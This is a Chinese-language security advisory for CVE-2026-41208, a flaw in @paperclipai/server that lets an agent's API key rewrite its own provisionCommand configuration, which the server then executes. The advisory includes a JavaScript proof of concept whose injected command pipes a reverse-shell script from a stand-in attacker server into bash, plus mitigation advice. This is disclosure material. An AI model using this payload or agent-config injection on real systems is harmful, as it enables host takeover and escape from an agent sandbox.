CVE-2026-41208 CVSS 8.8 高危

CVE-2026-41208 Paperclip权限提升致RCE漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41208

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Paperclip (@paperclipai/server)

漏洞概述

@paperclipai/server 2026.416.0之前版本存在权限提升漏洞。由于服务器允许Agent通过API更新自身的adapterConfig，攻击者可利用Agent API密钥篡改workspaceStrategy.provisionCommand字段。该配置字段在后续会被服务器直接执行，导致攻击者可注入任意恶意操作系统命令，从而突破信任边界，实现对服务器主机的远程代码执行。

技术细节

该漏洞源于@paperclipai/server在处理Agent配置更新时存在严重的输入验证缺失。具体而言，服务器允许持有Agent API密钥的用户通过/agents/:id接口直接修改adapterConfig。攻击者可利用这一功能，将恶意的Shell命令注入到adapterConfig.workspaceStrategy.provisionCommand字段中。当Paperclip服务器后续进行工作空间配置时，会自动读取该字段内容并作为系统命令执行。由于缺乏有效的输入清洗和沙箱隔离机制，攻击者注入的命令将以服务器进程的高权限运行。这完全打破了Agent运行时与服务器主机之间的信任边界，使得攻击者能够从受限的Agent环境逃逸，获得服务器主机的完整控制权，执行包括文件窃取、数据篡改在内的任意恶意操作。

攻击链分析

STEP 1

获取凭证

攻击者获取一个有效的Agent API密钥。

STEP 2

发送恶意请求

攻击者向/agents/:id端点发送PATCH请求，修改adapterConfig.workspaceStrategy.provisionCommand字段，注入恶意Shell命令。

STEP 3

触发漏洞

当Paperclip服务器执行工作空间配置任务时，读取被篡改的配置项。

STEP 4

执行命令

服务器运行时在主机上执行注入的恶意命令，导致RCE。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC: Malicious command injection via agent configuration update
const targetUrl = 'https://target-paperclip-server.com/agents/agent_id_here';
const maliciousCmd = 'curl http://attacker-controlled-server/reverse_shell.sh | bash';

fetch(targetUrl, {
  method: 'PATCH',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer VALID_AGENT_API_KEY'
  },
  body: JSON.stringify({
    adapterConfig: {
      workspaceStrategy: {
        provisionCommand: maliciousCmd
      }
    }
  })
}).then(response => console.log('Command injected successfully'));

影响范围

@paperclipai/server < 2026.416.0

防御指南

临时缓解措施

建议立即升级至修复版本。若暂时无法升级，应严格监控Agent配置变更日志，排查adapterConfig字段是否包含异常命令。在网络层面，可限制Agent对管理接口的访问，并检查服务器主机是否存在可疑进程或网络连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表